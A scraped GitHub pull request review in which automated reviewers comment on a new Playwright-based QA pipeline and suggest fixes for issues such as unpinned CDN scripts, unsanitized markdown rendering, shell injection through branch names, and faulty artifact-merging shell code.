Adds a label-triggered automated QA pipeline that records Playwright E2E sessions, performs AI-assisted before/after review, and publishes an artifact site (videos + badge + report) to Cloudflare Pages.
Changes:
- Introduces a GitHub Actions workflow (`pr-qa.yaml`) to run focused/full QA flows, generate reports, deploy to Pages, and comment back on PRs/issues.
- Adds supporting QA scripts for PR/issue analysis, test generation, deterministic replay/narration, and video review.
- Adds documentation and config updates to support the new QA pipeline and CI-only dependencies.
Reviewed changes
Copilot reviewed 18 out of 18 changed files in this pull request and generated 7 comments.
Summary per file:
| File | Description |
|---|---|
| `.github/workflows/pr-qa.yaml` | Orchestrates the multi-phase QA pipeline, artifact collection, deployment, and commenting. |
| `scripts/qa-agent.ts` | Claude-driven research phase that writes/runs Playwright tests to reproduce bugs. |
| `scripts/qa-analyze-pr.ts` | Fetches PR/issue context, extracts media, and generates QA guides via Gemini. |
| `scripts/qa-analyze-pr.test.ts` | Unit tests for media URL extraction logic used by PR/issue analysis. |
| `scripts/qa-record.ts` | (Referenced) Executes QA recording flows that produce the session artifacts consumed by report/review steps. |
| `scripts/qa-reproduce.ts` | Deterministic replay + a11y snapshotting + Gemini narration for the evidence chain. |
| `scripts/qa-video-review.ts` | Generates structured (single or comparative) Gemini video review markdown reports. |
| `scripts/qa-video-review.test.ts` | Unit tests for platform/video selection utilities used by video review. |
| `scripts/qa-generate-test.ts` | Generates Playwright regression tests from QA report + PR diff via Gemini. |
| `scripts/qa-deploy-pages.sh` | Builds/deploys the QA report site + badge to Cloudflare Pages. |
| `scripts/qa-report-template.html` | Static report UI for videos, badge copy, and embedded markdown reviews. |
| `scripts/qa-batch.sh` | Utility for batch-triggering QA runs via branch pushes and cleanup. |
| `knip.config.ts` | Ignores CI-installed QA dependencies for knip. |
| `docs/qa/TROUBLESHOOTING.md` | Documents common pipeline failures and fixes. |
| `docs/qa/models.md` | Documents model choices and upgrade history for the pipeline. |
| `docs/qa/backlog.md` | Captures planned improvements and cost optimizations. |
| `.claude/skills/comfy-qa/SKILL.md` | Claude skill documentation for QA pipeline operation. |
| `.claude/skills/comfy-qa/REPRODUCE.md` | Detailed manual/agent-driven issue reproduction procedure. |
```html
<!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><title>QA Session Recordings</title>
<link rel=preconnect href=https://fonts.googleapis.com><link rel=preconnect href=https://fonts.gstatic.com crossorigin><link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@400;500&display=swap" rel=stylesheet>
<script src="https://cdn.jsdelivr.net/npm/marked/marked.min.js"></script>
```
marked is loaded from a CDN without pinning an exact version or using Subresource Integrity (SRI). This makes the report page vulnerable to supply-chain changes at the CDN URL. Consider pinning a specific marked@x.y.z and adding an integrity attribute (or bundling the dependency into the deployed assets).
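The integrity value the comment asks for is just a base64-encoded SHA-384 digest of the exact pinned file, prefixed with the algorithm name. A minimal sketch with Node's `crypto` module (the pinned URL below keeps the review's `marked@x.y.z` placeholder; fill in a real version):

```typescript
// Compute a Subresource Integrity (SRI) value for a script body:
// base64-encoded SHA-384 digest, prefixed with the algorithm name.
import { createHash } from "node:crypto";

export function sriFor(body: string | Buffer): string {
  const digest = createHash("sha384").update(body).digest("base64");
  return `sha384-${digest}`;
}

// Usage sketch: fetch the exact pinned file once, compute sriFor(file), then
// embed (version placeholder from the review comment, not a recommendation):
// <script src="https://cdn.jsdelivr.net/npm/marked@x.y.z/marked.min.js"
//         integrity="sha384-..." crossorigin="anonymous"></script>
```

With both a pinned version and an `integrity` attribute, a changed file at the CDN URL fails the browser's digest check instead of executing.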
```js
</div><script>
function copyBadge(){const u=location.href.replace(/\/[^/]*$/,'/');const b=u+'badge.svg';const md='[]('+u+')';navigator.clipboard.writeText(md).then(()=>{const btn=document.querySelector('.copy-badge');btn.classList.add('copied');btn.innerHTML='<svg width=14 height=14 viewBox="0 0 24 24" fill=none stroke=currentColor stroke-width=2><polyline points="20 6 9 17 4 12"/></svg>';setTimeout(()=>{btn.classList.remove('copied');btn.innerHTML='<svg width=14 height=14 viewBox="0 0 24 24" fill=none stroke=currentColor stroke-width=2><rect x=9 y=9 width=13 height=13 rx=2/><path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1"/></svg>'},2000)})}
document.querySelectorAll('[data-md]').forEach(el=>{const t=el.textContent;el.removeAttribute('data-md');el.innerHTML=marked.parse(t)});
const FPS=30,FT=1/FPS,SPEEDS=[0.1,0.25,0.5,1,1.5,2];
```
Markdown is converted to HTML via marked.parse() and assigned to innerHTML without any sanitization. Since the markdown comes from AI output and PR/issue context, this can introduce XSS vectors (e.g., javascript: links or attribute injection in images/links). Consider sanitizing the rendered HTML (e.g., DOMPurify) and/or restricting allowed URL protocols and disallowing raw HTML in the renderer.
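A minimal illustration of the protocol-allowlisting idea from the comment. This regex-based sketch is NOT a complete sanitizer (DOMPurify is the safer choice in practice); it only shows how `javascript:`/`data:` URLs in `href`/`src` attributes can be neutralized before assigning to `innerHTML`:

```typescript
// Sketch only: replace href/src attributes whose URL protocol is not on an
// allowlist. A real fix should use a full HTML sanitizer such as DOMPurify;
// this illustrates the protocol-restriction half of the suggestion.
const SAFE_PROTOCOLS = ["http:", "https:", "mailto:"];

export function restrictUrls(html: string): string {
  return html.replace(
    /(href|src)\s*=\s*"([^"]*)"/gi,
    (match, attr: string, url: string) => {
      try {
        // Resolve relative URLs against a dummy base so `new URL` accepts them.
        const proto = new URL(url, "https://example.invalid/").protocol;
        return SAFE_PROTOCOLS.includes(proto) ? match : `${attr}="#"`;
      } catch {
        return `${attr}="#"`; // unparseable URL: neutralize it
      }
    }
  );
}
```

In the report template this would run on `marked.parse(t)` output before the `innerHTML` assignment; disabling raw HTML in the renderer closes the remaining attribute-injection vectors this sketch does not cover.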
```ts
// Check assertion
let assertionPassed = false
let assertionActual = ''
if (step.expectedAssertion) {
  // Parse the expected assertion — e.g. "Settings dialog: visible" or "tab count: 2"
```
assertionPassed starts as false and is only updated when step.expectedAssertion is truthy. If a plan step has an empty/missing expectedAssertion, that entry will stay false and can make the overall allAssertionsPassed false even though no assertion was intended. Consider treating missing assertions as passed (or excluding such steps from the aggregate) so the overall verdict reflects only asserted checks.
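One way to implement the suggested fix is to aggregate only over steps that actually declare an assertion (step shape is assumed here for illustration):

```typescript
// Sketch of the suggested fix: compute the overall verdict only from steps
// that declared an expectedAssertion, so assertion-less steps can no longer
// drag allAssertionsPassed to false. The step shape is an assumption.
interface StepResult {
  expectedAssertion?: string;
  assertionPassed: boolean;
}

export function allAssertionsPassed(steps: StepResult[]): boolean {
  const asserted = steps.filter((s) => s.expectedAssertion);
  // Vacuously true when no step declared an assertion.
  return asserted.every((s) => s.assertionPassed);
}
```

Equivalently, steps without `expectedAssertion` could set `assertionPassed = true` up front; either way the verdict reflects only asserted checks.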
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | ||
| HAS_FILES=true | ||
| fi | ||
| # Check for after files | ||
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | ||
| HAS_FILES=true | ||
| fi | ||
| if [ "$HAS_FILES" = true ]; then | ||
| mkdir -p "$REPORT_DIR" | ||
| # Copy all before files (handles both flat and nested layouts) | ||
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | ||
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | ||
| done | ||
| # Copy all after files (overwrites duplicates with after versions) | ||
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | ||
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | ||
| done | ||
| echo "Merged $os artifacts into $REPORT_DIR" | ||
| ls -la "$REPORT_DIR/" | head -20 |
Copying all files found under `qa-artifacts/before` into a single `$REPORT_DIR` will flatten the directory structure and can overwrite same-named files from different matrix runs (e.g. multiple `qa-session.webm`/`mp4`). To keep per-OS outputs distinct, preserve the original `qa-report-*` subdirectories when merging (copy directories rather than individual files).
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| # Check for after files | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ "$HAS_FILES" = true ]; then | |
| mkdir -p "$REPORT_DIR" | |
| # Copy all before files (handles both flat and nested layouts) | |
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| done | |
| # Copy all after files (overwrites duplicates with after versions) | |
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| done | |
| echo "Merged $os artifacts into $REPORT_DIR" | |
| ls -la "$REPORT_DIR/" | head -20 | |
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| # Check for after files | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ "$HAS_FILES" = true ]; then | |
| mkdir -p "$REPORT_DIR/before" "$REPORT_DIR/after" | |
| # Preserve original before report directories to avoid flattening files | |
| find qa-artifacts/before -mindepth 1 -maxdepth 1 -type d -name 'qa-report-*' 2>/dev/null | while read -r dir; do | |
| cp -R "$dir" "$REPORT_DIR/before/" 2>/dev/null || true | |
| done | |
| # Preserve original after report directories to avoid flattening files | |
| find qa-artifacts/after -mindepth 1 -maxdepth 1 -type d -name 'qa-report-*' 2>/dev/null | while read -r dir; do | |
| cp -R "$dir" "$REPORT_DIR/after/" 2>/dev/null || true | |
| done | |
| echo "Merged $os artifacts into $REPORT_DIR" | |
| find "$REPORT_DIR" -maxdepth 3 -type f 2>/dev/null | head -20 |
| for os in Linux macOS Windows; do | ||
| REPORT_DIR="qa-artifacts/qa-report-${os}-${{ github.run_id }}" | ||
| HAS_FILES=false | ||
| # Check for before files (flat or in subdirectory) | ||
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | ||
| HAS_FILES=true | ||
| fi | ||
| # Check for after files | ||
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | ||
| HAS_FILES=true | ||
| fi | ||
| if [ "$HAS_FILES" = true ]; then | ||
| mkdir -p "$REPORT_DIR" | ||
| # Copy all before files (handles both flat and nested layouts) | ||
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | ||
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | ||
| done | ||
| # Copy all after files (overwrites duplicates with after versions) | ||
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | ||
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | ||
| done | ||
| echo "Merged $os artifacts into $REPORT_DIR" | ||
| ls -la "$REPORT_DIR/" | head -20 | ||
| break # Only create one report dir (multi-OS not yet supported in parallel mode) | ||
| fi | ||
| done | ||
Similarly, flattening all `qa-artifacts/after` files into `$REPORT_DIR` can overwrite per-OS recordings and prevents the deploy step from finding `qa-artifacts/qa-report-{OS}-{RUN_ID}/qa-session.mp4`. Preserve the directory structure when merging so each OS retains its own `qa-report-*` directory.
| for os in Linux macOS Windows; do | |
| REPORT_DIR="qa-artifacts/qa-report-${os}-${{ github.run_id }}" | |
| HAS_FILES=false | |
| # Check for before files (flat or in subdirectory) | |
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| # Check for after files | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ "$HAS_FILES" = true ]; then | |
| mkdir -p "$REPORT_DIR" | |
| # Copy all before files (handles both flat and nested layouts) | |
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| done | |
| # Copy all after files (overwrites duplicates with after versions) | |
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| done | |
| echo "Merged $os artifacts into $REPORT_DIR" | |
| ls -la "$REPORT_DIR/" | head -20 | |
| break # Only create one report dir (multi-OS not yet supported in parallel mode) | |
| fi | |
| done | |
| HAS_FILES=false | |
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -type f 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -type f 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ "$HAS_FILES" = true ]; then | |
| merge_artifact_tree() { | |
| SRC_ROOT="$1" | |
| if [ ! -d "$SRC_ROOT" ]; then | |
| return 0 | |
| fi | |
| find "$SRC_ROOT" -type f 2>/dev/null | while read -r f; do | |
| REL_PATH="${f#${SRC_ROOT}/}" | |
| DEST_PATH="qa-artifacts/${REL_PATH}" | |
| mkdir -p "$(dirname "$DEST_PATH")" | |
| cp "$f" "$DEST_PATH" 2>/dev/null || true | |
| done | |
| } | |
| # Preserve nested qa-report-* directories so downstream steps can | |
| # resolve qa-artifacts/qa-report-{OS}-${{ github.run_id }}/qa-session.mp4. | |
| merge_artifact_tree "qa-artifacts/before" | |
| merge_artifact_tree "qa-artifacts/after" | |
| echo "Merged artifacts with directory structure preserved" | |
| find qa-artifacts -maxdepth 2 -type d -name 'qa-report-*' 2>/dev/null | sort | |
| fi |
| # Check for before files (flat or in subdirectory) | ||
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | ||
| HAS_FILES=true | ||
| fi | ||
| # Check for after files | ||
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | ||
| HAS_FILES=true | ||
| fi | ||
| if [ "$HAS_FILES" = true ]; then | ||
| mkdir -p "$REPORT_DIR" | ||
| # Copy all before files (handles both flat and nested layouts) | ||
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | ||
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | ||
| done | ||
| # Copy all after files (overwrites duplicates with after versions) | ||
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | ||
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | ||
| done | ||
| echo "Merged $os artifacts into $REPORT_DIR" | ||
| ls -la "$REPORT_DIR/" | head -20 | ||
| break # Only create one report dir (multi-OS not yet supported in parallel mode) |
The `break` here limits report generation to a single OS directory. In qa-full (3-OS) runs this will drop the other platforms from the deployed report. If multi-OS reporting is expected, remove the `break` and generate per-OS report dirs for all platforms present.
| # Check for before files (flat or in subdirectory) | |
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| # Check for after files | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ "$HAS_FILES" = true ]; then | |
| mkdir -p "$REPORT_DIR" | |
| # Copy all before files (handles both flat and nested layouts) | |
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| done | |
| # Copy all after files (overwrites duplicates with after versions) | |
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| done | |
| echo "Merged $os artifacts into $REPORT_DIR" | |
| ls -la "$REPORT_DIR/" | head -20 | |
| break # Only create one report dir (multi-OS not yet supported in parallel mode) | |
| OS_PATTERN="/${os}/|[-_]${os}[-_.]" | |
| # Detect whether this OS has files in a nested or OS-tagged layout. | |
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -type f \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -Eiq "$OS_PATTERN"; then | |
| HAS_FILES=true | |
| fi | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -type f \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -Eiq "$OS_PATTERN"; then | |
| HAS_FILES=true | |
| fi | |
| # Preserve focused/Linux flat layout support when files are not OS-qualified. | |
| if [ "$HAS_FILES" = false ] && [ "$os" = "Linux" ]; then | |
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -type f \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -type f \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| fi | |
| if [ "$HAS_FILES" = true ]; then | |
| mkdir -p "$REPORT_DIR" | |
| # Copy before files for this OS. Fall back to all files for Linux flat layout. | |
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | |
| if printf '%s\n' "$f" | grep -Eiq "$OS_PATTERN" || { [ "$os" = "Linux" ] && ! find qa-artifacts/before -type f \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -Eiq "/(Linux|macOS|Windows)/|[-_](Linux|macOS|Windows)[-_.]"; }; then | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| fi | |
| done | |
| # Copy after files for this OS. After copies overwrite duplicate before files. | |
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | |
| if printf '%s\n' "$f" | grep -Eiq "$OS_PATTERN" || { [ "$os" = "Linux" ] && ! find qa-artifacts/after -type f \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -Eiq "/(Linux|macOS|Windows)/|[-_](Linux|macOS|Windows)[-_.]"; }; then | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| fi | |
| done | |
| echo "Merged $os artifacts into $REPORT_DIR" | |
| ls -la "$REPORT_DIR/" | head -20 |
| BRANCH: ${{ github.ref_name }} | ||
| REPO: ${{ github.repository }} | ||
| run: | | ||
| NUM="${PR_NUM:-$(gh pr list --repo "$REPO" --head "$BRANCH" --state open --json number --jq '.[0].number // empty')}" | ||
| echo "number=${NUM}" >> "$GITHUB_OUTPUT" | ||
| if [ -n "$NUM" ]; then | ||
| if gh api "repos/${REPO}/pulls/${NUM}" --jq '.number' >/dev/null 2>&1; then |
This step resolves the target number from the PR context (`github.event.pull_request.number` / PR lookup by branch), but it does not handle workflows triggered by `issues: labeled`. In issue reproduce runs, `BRANCH` can be empty and `number` may be unset, which cascades into missing target URLs/context and no issue comment/badge labeling. Prefer reusing `needs.resolve-matrix.outputs.number` / `target_type`, or include `github.event.issue.number` here.
| BRANCH: ${{ github.ref_name }} | |
| REPO: ${{ github.repository }} | |
| run: | | |
| NUM="${PR_NUM:-$(gh pr list --repo "$REPO" --head "$BRANCH" --state open --json number --jq '.[0].number // empty')}" | |
| echo "number=${NUM}" >> "$GITHUB_OUTPUT" | |
| if [ -n "$NUM" ]; then | |
| if gh api "repos/${REPO}/pulls/${NUM}" --jq '.number' >/dev/null 2>&1; then | |
| ISSUE_NUM: ${{ github.event.issue.number }} | |
| BRANCH: ${{ github.ref_name }} | |
| REPO: ${{ github.repository }} | |
| run: | | |
| NUM="${PR_NUM:-${ISSUE_NUM:-}}" | |
| if [ -z "$NUM" ] && [ -n "$BRANCH" ]; then | |
| NUM="$(gh pr list --repo "$REPO" --head "$BRANCH" --state open --json number --jq '.[0].number // empty')" | |
| fi | |
| echo "number=${NUM}" >> "$GITHUB_OUTPUT" | |
| if [ -n "$NUM" ]; then | |
| if [ -n "$ISSUE_NUM" ] && [ "$NUM" = "$ISSUE_NUM" ]; then | |
| echo "target_type=issue" >> "$GITHUB_OUTPUT" | |
| elif gh api "repos/${REPO}/pulls/${NUM}" --jq '.number' >/dev/null 2>&1; then |
Actionable comments posted: 9
🧹 Nitpick comments (6)
scripts/qa-generate-test.ts (1)
140-144: Consider making the markdown fence stripping more robust. The regex only handles `` ```typescript `` and `` ```ts `` fences. If the model returns `` ```javascript `` or other language hints, they won't be stripped.

♻️ Suggested improvement

````diff
 // Strip markdown fences if model wraps output
 return text
-  .replace(/^```(?:typescript|ts)?\n?/, '')
+  .replace(/^```[a-z]*\n?/, '')
   .replace(/\n?```$/, '')
   .trim()
````

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@scripts/qa-generate-test.ts` around lines 140 - 144, the current markdown-fence stripping only matches "```typescript" or "```ts"; update the first replace on the returned text so it strips any fenced-code language hint instead (e.g., replace the /^```(?:typescript|ts)?\n?/ pattern used when returning text) by using a single, broader regex that matches any characters after the opening backticks up to the newline (for example /^```[^\n]*\n?/), ensuring the final .replace and .trim logic remain unchanged.

scripts/qa-batch.sh (1)
90-92: `grep -oP` requires GNU grep (not available by default on macOS). The Perl regex flag `-P` is a GNU grep extension. If developers run this script on macOS, they'll need `ggrep` from Homebrew. Since this is primarily a CI utility script, this is likely acceptable, but consider documenting the requirement or using a more portable alternative.

♻️ Portable alternative using sed

```diff
 # Extract Tier 1 table rows: | N | [`#NNNNN`](...) | ...
 # Stop at the next ## heading after Tier 1
 extracted=$(awk '/^## Tier 1/,/^## Tier [^1]/' "$FROM_FILE" \
-  | grep -oP '\[#\K\d+' \
+  | sed -n 's/.*\[#\([0-9]*\)\].*/\1/p' \
   | head -n "$TOP_N")
```

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@scripts/qa-batch.sh` around lines 90 - 92, the current assignment to the variable `extracted` uses `grep -oP` (Perl-regex) which depends on GNU grep; replace that pipeline with a portable awk-only extraction (so the section selection with awk then extracting the digits that follow `[#` without using `-P`), or alternatively add a clear comment/documentation near the `extracted` assignment stating that GNU grep (`ggrep`) is required on macOS and fail fast if it's not present; update the `extracted` assignment (referencing the `extracted` variable and the pipeline that currently uses `awk ... | grep -oP '\[#\K\d+' | head -n "$TOP_N"`) to use one of these portable approaches.

scripts/qa-report-template.html (1)
3-3: Consider adding an SRI hash for the external marked.js dependency. Loading `marked.min.js` from a CDN without subresource integrity (SRI) allows potential supply-chain attacks if the CDN is compromised.

♻️ Add integrity attribute

```diff
-<script src="https://cdn.jsdelivr.net/npm/marked/marked.min.js"></script>
+<script src="https://cdn.jsdelivr.net/npm/marked@15.0.7/marked.min.js" integrity="sha384-..." crossorigin="anonymous"></script>
```

You can generate the hash using:

```shell
curl -s https://cdn.jsdelivr.net/npm/marked@15.0.7/marked.min.js | openssl dgst -sha384 -binary | openssl base64 -A
```

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@scripts/qa-report-template.html` at line 3, the external marked.js script tag (src="https://cdn.jsdelivr.net/npm/marked/marked.min.js") lacks SRI and crossorigin attributes; update the script element to pin a specific version (e.g., use marked@15.0.7 in the src), compute the SHA-384 base64 hash for that exact file (using the curl + openssl command shown in the review), and add integrity="sha384-..." and crossorigin="anonymous" attributes to the tag so the browser verifies the file before executing.

scripts/qa-video-review.ts (1)
668-708: Minor inefficiency: `stat` called twice for before video. The `beforeVideoPath` is stat'd at line 668 for logging and again at line 705 for the report. Consider caching the stat result to avoid the redundant filesystem call.

♻️ Cache stat result to avoid redundant call

```diff
 const beforeVideoPath = options.beforeVideo ? resolve(options.beforeVideo) : ''
+let beforeVideoStat: Awaited<ReturnType<typeof stat>> | undefined
 if (beforeVideoPath) {
-  const beforeStat = await stat(beforeVideoPath)
+  beforeVideoStat = await stat(beforeVideoPath)
   process.stdout.write(
-    `[${video.platformName}] Before video: ${toProjectRelativePath(beforeVideoPath)} (${formatBytes(beforeStat.size)})\n`
+    `[${video.platformName}] Before video: ${toProjectRelativePath(beforeVideoPath)} (${formatBytes(beforeVideoStat.size)})\n`
   )
 }

 // ... later ...

 if (beforeVideoPath) {
-  const beforeStat = await stat(beforeVideoPath)
   reportInput.beforeVideoPath = beforeVideoPath
-  reportInput.beforeVideoSizeBytes = beforeStat.size
+  reportInput.beforeVideoSizeBytes = beforeVideoStat!.size
 }
```

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@scripts/qa-video-review.ts` around lines 668 - 708, the code calls stat(beforeVideoPath) twice: once to log size into beforeStat and again to populate reportInput.beforeVideoSizeBytes; reuse the first result instead of calling stat a second time. Keep the existing beforeStat variable (from the logging block) in scope or rename to beforeStatCached and then set reportInput.beforeVideoPath = beforeVideoPath and reportInput.beforeVideoSizeBytes = beforeStatCached.size before calling buildReportMarkdown; ensure no second await stat(beforeVideoPath) remains.

.github/workflows/pr-qa.yaml (2)
498-642: Badge generation scripts are functional but could be extracted. The inline badge generation scripts (gen-badge.sh, gen-badge-dual.sh, gen-badge-box.sh) are complex and total ~150 lines. Consider extracting these to `scripts/qa-gen-badge.sh` for easier maintenance and testing, though this is optional given they work correctly.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/pr-qa.yaml around lines 498 - 642, The inline badge-generation scripts (gen-badge.sh, gen-badge-dual.sh, gen-badge-box.sh) are large and should be extracted into a maintained script file; move the contents of each heredoc into a new executable file under scripts/, e.g. scripts/qa-gen-badge.sh (or separate files scripts/gen-badge.sh, scripts/gen-badge-dual.sh, scripts/gen-badge-box.sh), preserve the exact function names/entrypoints (usage comments and variable names like BUG, FIX, REPRO, add_row) and make them executable, then update the workflow to call those scripts (replace the heredoc creation steps with simple cp or checkout references and chmod +x and ensure /tmp/gen-badge.sh, /tmp/gen-badge-dual.sh, /tmp/gen-badge-box.sh invocations still work) so the behavior remains identical but the scripts live in the repo for testing and maintenance.
494-494: Consider using `npx` instead of a global wrangler install. Using `npm install -g` installs globally, which works, but `npx wrangler@4.74.0` would be cleaner and avoid polluting the global namespace. This is a minor suggestion.

♻️ Use npx instead of global install

Replace the global install and subsequent `wrangler` calls with `npx wrangler@4.74.0`:

```diff
- npm install -g wrangler@4.74.0 >/dev/null 2>&1
+ # wrangler will be invoked via npx below
```

Then in deploy-badge.sh and qa-deploy-pages.sh, use:

```diff
- wrangler pages deploy ...
+ npx wrangler@4.74.0 pages deploy ...
```
Verify each finding against the current code and only fix it if needed. In @.github/workflows/pr-qa.yaml at line 494, Replace the global installation command `npm install -g wrangler@4.74.0` with using npx for the specific wrangler invocation; update any subsequent calls that rely on a globally installed `wrangler` (references in deploy-badge.sh and qa-deploy-pages.sh) to invoke `npx wrangler@4.74.0` instead so the workflow runs the pinned version without installing globally and avoids modifying the runner's global state.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In @.github/workflows/pr-qa.yaml:
- Around line 862-910: The step uses github.head_ref directly in the inline
shell which allows shell injection via PR_BRANCH and later TEST_BRANCH; set the
branch value as a step-level env var (e.g., env: PR_BRANCH: '${{ github.head_ref
|| github.ref_name }}') and then in the script sanitize and safely quote it
before use (e.g., PR_BRANCH="${PR_BRANCH//[^a-zA-Z0-9._\/-]/_}";
PR_BRANCH="${PR_BRANCH}" and always quote expansions like "$PR_BRANCH" and
"$TEST_BRANCH"), and use safe git invocations (git checkout -- "$TEST_BRANCH",
git push origin -- "$TEST_BRANCH") so git commands and the branch names
(PR_BRANCH, TEST_BRANCH) cannot be used to inject shell commands.
In `@scripts/qa-analyze-pr.ts`:
- Around line 120-132: ghExec currently swallows all gh failures and returns an
empty string, which lets PR/issue fetchers (the functions that call ghExec to
get title/body/diff) continue with bogus empty data; change ghExec to propagate
failures by throwing an Error (including the command, exit code/ stderr and
original error message) instead of returning '' (or alternatively call
process.exit(1) after logging), and update the callers in the PR/issue fetchers
to either catch and handle that exception or let it bubble to fail the job;
ensure logs include the gh command, stderr and error.message for debugging.
In `@scripts/qa-deploy-pages.sh`:
- Around line 372-380: The script currently masks deployment failures by running
`wrangler pages deploy ... 2>&1) || true` and always writing a fallback `url=`
to `GITHUB_OUTPUT`; remove the `|| true` and instead check the deploy exit
status (or inspect `DEPLOY_OUTPUT`) after running `wrangler pages deploy` and
only set `URL`/`FALLBACK_URL` and write to `GITHUB_OUTPUT` when the deploy
succeeded; if the deploy failed, emit an error (use `echo`/`processLogger`
equivalent) and exit non-zero so downstream steps don't get a fake Pages URL —
key symbols to update: `wrangler pages deploy`, `DEPLOY_OUTPUT`, `URL`,
`FALLBACK_URL`, and `GITHUB_OUTPUT`.
In `@scripts/qa-record.ts`:
- Around line 1035-1044: The current case 'cloneNode' handler in
scripts/qa-record.ts is performing a generic copy/paste (Ctrl+C/Ctrl+V) which
does not exercise the real Clone functionality; replace the keystroke sequence
with a call that invokes the application's actual Clone/duplicate command (e.g.,
click the clone/duplicate toolbar/menu/button element or trigger the app's clone
command via the command palette or exposed API) so tests exercise the Clone code
path; update the same pattern in the other cloneNode occurrences noted (the
blocks around the other mentions) to use the real clone action instead of
Ctrl+C/Ctrl+V and emit a matching log message.
- Around line 630-687: The loadDefaultWorkflow flow can mark loaded=true even
when no menu action ran because resetToDefaultWorkflow may be missing and
clickSubmenuItem never reports failure; change clickSubmenuItem to return a
boolean (true when it found & clicked a menu entry, false when none matched) and
update loadDefaultWorkflow to use that return value (and the presence of
resetToDefaultWorkflow) to set loaded only when an actual action occurred;
specifically modify clickSubmenuItem (and its callers) to return true after each
